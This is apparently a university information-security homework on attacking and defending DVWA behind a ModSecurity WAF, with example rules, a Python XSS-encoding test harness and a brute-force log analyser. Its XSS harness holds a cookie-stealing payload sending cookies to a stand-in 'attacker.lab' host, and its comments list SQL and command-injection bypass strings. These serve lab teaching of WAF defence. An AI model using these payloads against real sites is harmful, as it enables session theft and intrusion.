# CMP 5006 - Information Security 

## Homework 2

- Work in groups of 2 or 3
- For submission, clone the class repo and create a branch for your homework. Add your work to the "homework_2" folder, inside a new folder named with the format "last_name-hw2". Submit a pull request.
- In D2L, submit a zip file with your homework and include the link to your pull request in the comments.
- Also in D2L, give each partner a grade between 0 and 10 for their contribution to the group work.

## Overview

In this homework assignment, you will explore various aspects of web security through hands-on exercises. You will work with DVWA (Damn Vulnerable Web Application), Kali Linux, and an open-source WAF (Web Application Firewall). This assignment is designed to give you practical experience with both offensive and defensive security techniques.

## Requirements

- Work in the groups specified in the submission instructions above
- Each group needs at least two machines (physical or VMs) that can reach each other on an isolated lab network:
  - Computer 1: Running Kali Linux (attacker)
  - Computer 2: Running DVWA behind ModSecurity (target/defender)
- Duration: 2 weeks
- Deliverable: A comprehensive report detailing your methodology, findings, and mitigation strategies

## Setup Instructions

1. **Computer 1 (Attacker)**:
   - Install Kali Linux (VM is acceptable)
   - Ensure Burp Suite, OWASP ZAP, sqlmap, and Hydra are installed and updated

2. **Computer 2 (Target/Defender)**:
   - Install DVWA (follow the instructions at [DVWA GitHub](https://github.com/digininja/DVWA))
   - Install ModSecurity in the web server that serves DVWA and configure it as your WAF
   - Enable access and error logging for the web server and the ModSecurity audit log; the problems below rely on these logs to show what was attempted and what was blocked
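As an added example (not taken from DVWA, ModSecurity, or the course materials), here is a starting point for the ModSecurity engine settings and the Apache virtual host on Computer 2. File paths and the `dvwa.lab` name follow the Debian/Kali packaging of `libapache2-mod-security2` and are assumptions. The engine starts in DetectionOnly so the rules you write later can be checked against the audit log before they are allowed to block DVWA:

```apache
# /etc/modsecurity/modsecurity.conf
# (assumed path; Debian ships modsecurity.conf-recommended, copy it to this
# name and change the directives below)

# Log matches but do not block yet. Switch to On once your rules are tuned.
SecRuleEngine DetectionOnly

# DVWA's login form and most modules submit POST bodies, so inspect them.
SecRequestBodyAccess On

# One audit record for every transaction that triggered a rule or ended in a
# 4xx/5xx (404 excluded). Parts: B request headers, I request body,
# E response body, F response headers, H the trailer listing the rule ids
# that fired, Z end of record.
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus "^(?:5|4(?!04))"
SecAuditLogType Serial
SecAuditLogParts ABIJDEFHZ
SecAuditLog /var/log/apache2/modsec_audit.log

# Level 3 shows which rule matched and on which variable. Level 9 traces every
# transformation step; use it for one request at a time, not for a lab day.
SecDebugLog /var/log/apache2/modsec_debug.log
SecDebugLogLevel 3

# /etc/apache2/sites-available/dvwa.conf
<VirtualHost *:80>
    ServerName dvwa.lab
    DocumentRoot /var/www/html/DVWA

    # Problem 3's log analysis reads this file (Apache "combined" format).
    CustomLog ${APACHE_LOG_DIR}/dvwa_access.log combined
    ErrorLog  ${APACHE_LOG_DIR}/dvwa_error.log

    <IfModule security2_module>
        # The custom rule files written for Problems 1 to 4 are loaded from here.
        IncludeOptional /etc/modsecurity/custom/*.conf
    </IfModule>
</VirtualHost>
```

Enable it with `a2enmod security2`, `a2ensite dvwa`, `apachectl configtest` and `systemctl reload apache2`. With no rules loaded, RelevantOnly writes an audit record only for 4xx/5xx responses, so do not expect entries for attack requests until the custom rules (Problems 1 to 4) or the CRS (Problem 5) are in place.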



## Problem 1: SQL Injection Attack and Defense 


**Tasks**:
1. Configure DVWA's security level to "low"
2. Using the Kali Linux machine, perform manual SQL injection attacks against DVWA's SQL Injection module
3. Document the process and payloads used
4. Use sqlmap to automate the SQL injection process and extract database information (pass it your authenticated session cookie and the DVWA security-level cookie, otherwise it only ever sees the login page)
5. On the defender's side, configure ModSecurity rules to detect and block SQL injection attacks
6. Test the effectiveness of your WAF rules by repeating the attacks
7. Document the rules that successfully blocked attacks and those that allowed attacks through
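An added example for steps 5 to 7, not code from DVWA, ModSecurity, or the CRS: a custom rule file for DVWA's SQL Injection module, which takes its input as `GET /vulnerabilities/sqli/?id=...`. The first rule is the fixed-string signature a first attempt tends to produce; the next two are what a practitioner would deploy. Rule ids in the 100000 range, the file name and the path are assumptions:

```apache
# /etc/modsecurity/custom/10-sqli.conf (assumed path; rule ids are examples)

# Naive signature. Bypassed by a case change ("1' oR 1=1#"), by inline
# comments ("1'/**/OR/**/1=1#") and by any differently shaped payload such
# as a UNION SELECT, because it matches one literal string and nothing is
# normalised first.
SecRule ARGS:id "@rx ' OR 1=1" \
    "id:100001,\
    phase:2,\
    deny,\
    status:403,\
    log,\
    t:none,\
    msg:'Naive SQLi signature matched on id'"

# Normalise, then hand the value to libinjection, which tokenises it as SQL
# instead of looking for fixed strings. Case, comments and encoding tricks
# that beat rule 100001 do not change the token stream.
SecRule ARGS:id "@detectSQLi" \
    "id:100002,\
    phase:2,\
    deny,\
    status:403,\
    log,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\
    msg:'SQL injection attempt in id (libinjection)',\
    logdata:'Matched data: %{MATCHED_VAR}',\
    severity:CRITICAL,\
    tag:'hw2-sqli'"

# Positive security for this endpoint: id is an integer key, so anything
# that is not a short run of digits is rejected regardless of the technique.
# This is the rule that also stops payloads libinjection has never seen.
SecRule REQUEST_FILENAME "@beginsWith /vulnerabilities/sqli/" \
    "id:100003,\
    phase:2,\
    deny,\
    status:403,\
    log,\
    chain,\
    msg:'Non-numeric id submitted to the sqli module'"
    SecRule ARGS:id "!@rx ^[0-9]{1,10}$" "t:none"
```

After `apachectl configtest` and a reload, repeat step 2 and the sqlmap run with `SecRuleEngine On`. Every blocked request leaves an audit entry whose H part names the rule id that fired, which is the evidence step 7 asks for. To see the gap between the rules, comment out 100002 and 100003 and rerun sqlmap with `--tamper=randomcase` or `--tamper=space2comment`: rule 100001 matches little of what sqlmap sends even without tamper scripts, and these show how cheaply a fixed-string signature is evaded.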

**Deliverables**:
- Screenshots of successful SQL injection attacks
- sqlmap command output
- ModSecurity rules implemented
- Analysis of defense effectiveness

## Problem 2: Cross-Site Scripting (XSS) Exploitation 


**Tasks**:
1. Identify reflected and stored XSS vulnerabilities in DVWA
2. Craft at least three different XSS payloads with different functions (e.g., cookie stealing, keylogging, phishing)
3. Successfully execute these payloads against the DVWA instance
4. Create custom ModSecurity rules to detect and prevent XSS attacks
5. Test your rules by attempting to bypass them with various encoding techniques
6. Document your findings and the effectiveness of your defensive measures
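Step 5 asks you to try encodings against your rules. The script below is an added example (not from DVWA or ModSecurity) that models what a ModSecurity rule actually sees: ARGS values arrive URL-decoded once by the engine, and any further decoding happens only through the transformations the rule declares (`t:urlDecodeUni`, `t:htmlEntityDecode`, `t:lowercase`). It runs a naive `<script` signature with and without that transformation chain over encoded variants of a cookie-stealing payload, so you can see which encodings each version catches and which payload neither catches. The collector host `attacker.lab` is an assumption. The same harness is useful for the bypass work in Problem 5.

```python
#!/usr/bin/env python3
"""Model how encoding affects a signature rule with and without ModSecurity
transformations. Added example for Problem 2; attacker.lab is a made-up host."""
import html
import re
import urllib.parse

# Cookie-stealing payload (the collector at attacker.lab is assumed).
PAYLOAD = "<script>document.location='http://attacker.lab/c?'+document.cookie</script>"

# The signature a first attempt at a rule tends to use: SecRule ARGS "@rx <script"
SIGNATURE = re.compile(r"<script")


def received_variants(payload):
    """Variants as they appear in ARGS, i.e. after the engine's single URL-decode.

    The 'wire' comments say what the attacker actually puts in the query string.
    """
    entities = "".join(f"&#{ord(c)};" for c in payload)
    once = urllib.parse.quote(payload, safe="")
    return {
        # wire: the payload URL-encoded once (the browser does this); the engine decodes it back
        "plain": payload,
        # wire: same, with the tag name re-cased
        "mixed-case": payload.replace("<script>", "<ScRiPt>").replace("</script>", "</sCrIpT>"),
        # wire: quote(quote(payload)); the engine strips one layer and ARGS holds this
        "double-url-encoded": once,
        # wire: quote(entities); the app decodes entities only if it renders them unescaped
        "html-entities": entities,
        # wire: a payload that never contains the literal tag the signature looks for
        "event-handler": "<img src=x onerror=\"document.location='http://attacker.lab/c?'+document.cookie\">",
    }


def naive_rule(value):
    """SecRule ARGS "@rx <script" with no transformations (t:none)."""
    return bool(SIGNATURE.search(value))


def modsec_transform(value):
    """Approximates t:urlDecodeUni,t:htmlEntityDecode,t:lowercase, in that order."""
    value = urllib.parse.unquote(value)
    value = html.unescape(value)
    return value.lower()


def hardened_rule(value):
    """Same signature, applied after the transformation chain."""
    return bool(SIGNATURE.search(modsec_transform(value)))


def evaluate(payload=PAYLOAD):
    """Return {variant: (blocked_by_naive_rule, blocked_by_hardened_rule)}."""
    return {name: (naive_rule(v), hardened_rule(v))
            for name, v in received_variants(payload).items()}


if __name__ == "__main__":
    for name, (naive, hardened) in evaluate().items():
        verdict_naive = "BLOCK" if naive else "pass"
        verdict_hardened = "BLOCK" if hardened else "pass"
        print(f"{name:20s} naive={verdict_naive:5s} with-transforms={verdict_hardened}")
```

The transformation chain recovers every encoded form of the same payload, which is why a rule without `t:urlDecodeUni,t:htmlEntityDecode,t:lowercase` is the first thing to test in step 5. It does nothing for the `event-handler` variant, because the signature itself is too narrow: a real rule should use `@detectXSS` (libinjection) or a pattern that covers attributes and event handlers, and your step 6 write-up should distinguish encoding evasions (fixed by transformations) from signature gaps (fixed only by a better detector).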

**Deliverables**:
- Screenshots of successful XSS exploits
- Source code for your XSS payloads
- ModSecurity rules created
- Analysis of evasion techniques and their success/failure

## Problem 3: Brute Force Attack Analysis


**Tasks**:
1. Using Hydra on Kali Linux, perform a brute force attack against DVWA's login page (the main login form or the Brute Force module)
2. Create a custom wordlist for your attack
3. Configure ModSecurity to implement rate limiting and detect brute force attacks
4. Set up logging to capture login attempts
5. Develop a simple script to analyze logs and identify potential brute force attacks
6. Test the effectiveness of your detection and prevention mechanisms
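Added example for step 3, not code from DVWA or ModSecurity: ModSecurity has no rate-limiting directive, so the usual approach is a persistent per-client collection with an expiring counter. These rules count POSTs to `login.php` per source address and block the client once it exceeds five in a minute. The threshold, the rule ids and the file path are assumptions; for the Brute Force module (which submits its form via GET to `/vulnerabilities/brute/`) adjust the path and method in rule 100011.

```apache
# /etc/modsecurity/custom/30-bruteforce.conf (assumed path; rule ids are examples)

# Persistent collections are stored on disk; the directory must be writable
# by the Apache user. (Debian's recommended config already sets this.)
SecDataDir /var/cache/modsecurity

# Open (or create) a collection keyed by the client address on every request.
SecAction "id:100010,phase:1,pass,nolog,initcol:ip=%{REMOTE_ADDR}"

# Count login submissions. The counter expires 60 s after its last increment,
# so a client that stops for a minute starts again from zero.
SecRule REQUEST_FILENAME "@streq /login.php" \
    "id:100011,\
    phase:1,\
    pass,\
    nolog,\
    chain"
    SecRule REQUEST_METHOD "@streq POST" \
        "setvar:ip.login_attempts=+1,\
        expirevar:ip.login_attempts=60"

# Block the sixth and later requests in the window. Returning 429 makes
# this block easy to tell apart from 403s produced by other rules.
SecRule IP:LOGIN_ATTEMPTS "@gt 5" \
    "id:100012,\
    phase:1,\
    deny,\
    status:429,\
    log,\
    msg:'Login rate limit exceeded: %{ip.login_attempts} attempts from %{REMOTE_ADDR} in 60 s',\
    tag:'hw2-bruteforce'"
```

Two caveats to record in your report. The expiry is refreshed on every increment, so the window is really "since the client last paused for 60 s", which is stricter than five per minute; that is what you want against Hydra, but it will also block a user who mistypes a password six times slowly. And the counter counts all login submissions, successful or not; to count only failures, move the counter to phase:3 and chain it on `RESPONSE_HEADERS:Location` (DVWA answers a failed login with a redirect back to `login.php`; verify this in your lab before relying on it).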

**Deliverables**:
- Hydra command and output screenshot
- Your custom wordlist (first 10 entries only)
- ModSecurity configuration for brute force prevention
- Log analysis script
- Report on attack detection success rate
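For step 5, an added example (not the project's code) of the analysis script: it reads an Apache combined-format access log, counts login POSTs per client in a sliding 60-second window, and reports any address that exceeds the threshold. The embedded log lines are constructed for this example, the threshold and window (five per 60 seconds) are assumptions, and the Hydra user agent appears only to make the lines look like real traffic.

```python
#!/usr/bin/env python3
"""Flag brute-force login attempts in an Apache combined-format access log.

Added example for Problem 3 (not part of DVWA or ModSecurity). Assumes login
attempts are POSTs to /login.php; set LOGIN_PATH to /vulnerabilities/brute/
and METHOD to GET for DVWA's Brute Force module.
"""
import re
import sys
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/login.php"
METHOD = "POST"
WINDOW = timedelta(seconds=60)   # sliding window length
THRESHOLD = 5                    # attempts per window before an IP is flagged

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "ref" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: 10.0.0.5 hammers login.php, 10.0.0.9 is a normal user.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2024:13:55:36 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"',
    '10.0.0.5 - - [10/Oct/2024:13:55:36 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"',
    '10.0.0.5 - - [10/Oct/2024:13:55:37 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"',
    '10.0.0.9 - - [10/Oct/2024:13:55:38 +0000] "GET /login.php HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2024:13:55:38 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"',
    '10.0.0.9 - - [10/Oct/2024:13:55:40 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2024:13:55:41 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"',
    '10.0.0.5 - - [10/Oct/2024:13:55:44 +0000] "POST /login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Hydra)"',
    '10.0.0.9 - - [10/Oct/2024:13:56:10 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2024:14:30:00 +0000] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"',
    'this line is not in combined format',
]


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None for unparsable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]      # drop the query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Map each offending IP to its peak number of login attempts in any window."""
    attempts = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                               # skip junk rather than abort
        ip, ts, method, path, _status = parsed
        if method == METHOD and path == LOGIN_PATH:
            attempts[ip].append(ts)

    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):          # two-pointer sliding window
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, count in sorted(find_bruteforce(lines).items(), key=lambda kv: -kv[1]):
        print(f"{ip}: {count} login attempts within {WINDOW.seconds} s (threshold {THRESHOLD})")
```

Run it as `python3 bruteforce_log.py /var/log/apache2/dvwa_access.log` after a Hydra run; with no argument it analyses the constructed sample. Comparing its output with the ModSecurity audit log gives the detection success rate the last deliverable asks for: attempts the script counts but the WAF never logged are the ones that got through.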

## Problem 4: Command Injection Vulnerability 


**Tasks**:
1. Identify command injection vulnerabilities in DVWA
2. Create at least three different command injection payloads
3. Successfully execute these payloads on the target system
4. Document the impact of each payload
5. Implement ModSecurity rules to prevent command injection attacks
6. Test your rules against various bypass techniques
7. Document which techniques were successful in bypassing your defenses
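Added example for step 5, not code from DVWA or ModSecurity: two ways to protect DVWA's Command Injection module, which posts an `ip` field to `/vulnerabilities/exec/` and hands it to `ping`. The denylist is what most groups write first and is the one to attack in step 6; the allowlist is what the form actually needs. Rule ids and the file path are assumptions.

```apache
# /etc/modsecurity/custom/40-cmdi.conf (assumed path; rule ids are examples)

# Denylist: reject the obvious shell separators in ip. Every character left
# out of the class is a bypass candidate, and this class leaves several out
# on purpose so step 6 has something to find: a newline (%0a) also separates
# commands in sh; "$(id)" needs neither ";" nor "|"; and if you later add the
# space character, "${IFS}" replaces it. Keeping the list complete is a losing game.
SecRule ARGS:ip "@rx [;&|`]" \
    "id:100021,\
    phase:2,\
    deny,\
    status:403,\
    log,\
    t:none,t:urlDecodeUni,\
    msg:'Shell metacharacter in ip',\
    logdata:'%{MATCHED_VAR}'"

# Allowlist: the ping form only ever needs a dotted-quad address. Everything
# else is rejected, so a bypass has no characters left to work with. This is
# the rule to keep; the one above is there so you can document its gaps.
SecRule REQUEST_FILENAME "@beginsWith /vulnerabilities/exec/" \
    "id:100022,\
    phase:2,\
    deny,\
    status:403,\
    log,\
    chain,\
    msg:'ip is not an IPv4 address'"
    SecRule ARGS:ip "!@rx ^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$" "t:none,t:urlDecodeUni"
```

Test with rule 100022 commented out first, so your step 6 bypasses are measured against the denylist alone, then re-enable it and show that the same payloads are rejected. If you need the form to accept hostnames as well, extend the allowlist pattern rather than adding characters to the denylist.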

**Deliverables**:
- Screenshots of successful command injections
- Description of payload impact
- ModSecurity rules implemented
- Analysis of defense effectiveness against bypass techniques

## Problem 5: WAF Deployment and Evasion Techniques 


**Tasks**:
1. Deploy ModSecurity with the OWASP Core Rule Set (CRS)
2. Run the CRS at different paranoia levels (PL1 through PL4)
3. Create a custom virtual host configuration that protects DVWA
4. Perform attacks against all DVWA modules to test WAF effectiveness
5. Document which attacks are blocked at different paranoia levels
6. Develop at least three different WAF bypass techniques
7. Create a report analyzing the trade-offs between security and false positives
8. Implement custom rules to address the bypass techniques you developed
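Added example for steps 1, 2, 7 and 8, not the CRS's own files: the settings in `crs-setup.conf` that control the paranoia level and the anomaly thresholds, plus one targeted exclusion of the kind the trade-off analysis in step 7 usually ends in. Variable names are those of CRS 4 (CRS 3 names are noted in comments); paths follow Debian's `modsecurity-crs` package and are assumptions, and the DVWA parameter in the exclusion is an illustration, not a recommendation.

```apache
# /etc/modsecurity/crs/crs-setup.conf (assumed path)
# Load order in the Debian layout: crs-setup.conf, then rules/*.conf, then
# your exclusion file last, because SecRuleUpdateTargetById needs the rule
# to exist already.

# Paranoia level 1 has the fewest false positives; each higher level enables
# stricter rules and more noise. Run your attacks at PL1, 2, 3 and 4 and
# record, per DVWA module, what gets blocked.
# (CRS 3: the variable is tx.paranoia_level)
SecAction "id:900000,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    setvar:tx.blocking_paranoia_level=1"

# Evaluate the higher-level rules in log-only mode while blocking stays at
# the level above. The audit log then shows what PL4 would have blocked
# without actually breaking DVWA, which is how you measure false positives.
# (CRS 3: tx.executing_paranoia_level)
SecAction "id:900001,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    setvar:tx.detection_paranoia_level=4"

# Anomaly scoring: each matching rule adds its severity score (critical 5,
# error 4, warning 3, notice 2) and the request is blocked when the total
# reaches the inbound threshold. 5 means a single critical rule is enough;
# raising it trades missed attacks for fewer false positives.
SecAction "id:900110,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    setvar:tx.inbound_anomaly_score_threshold=5,\
    setvar:tx.outbound_anomaly_score_threshold=4"

# /etc/modsecurity/custom/99-exclusions.conf (assumed path, loaded after the CRS)
# Tuning a false positive: remove one parameter from one rule rather than
# switching the rule off for the whole site. Here the stored XSS module's
# free-text message field is taken out of the libinjection SQLi rule (942100)
# while the SQL Injection module's id parameter stays covered by it.
SecRuleUpdateTargetById 942100 "!ARGS:mtxMessage"
```

For step 5, keep a table of module, payload, paranoia level, rule ids from the audit log's H part, and anomaly score. For step 8, custom rules that close your bypasses belong in the same late-loaded file, with ids outside the CRS range (the CRS reserves 900000 to 999999); the tests you wrote against the CRS then double as regression tests for your own rules.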

**Deliverables**:
- Complete ModSecurity configuration files
- Test results of attacks at different paranoia levels
- Documentation of WAF bypass techniques
- Custom rules to address bypass techniques
- Analysis of security vs. usability trade-offs


## Note

Please respect ethical guidelines while performing these exercises. Do not attempt these techniques on systems without explicit permission. All work should be performed in your isolated lab environment only.

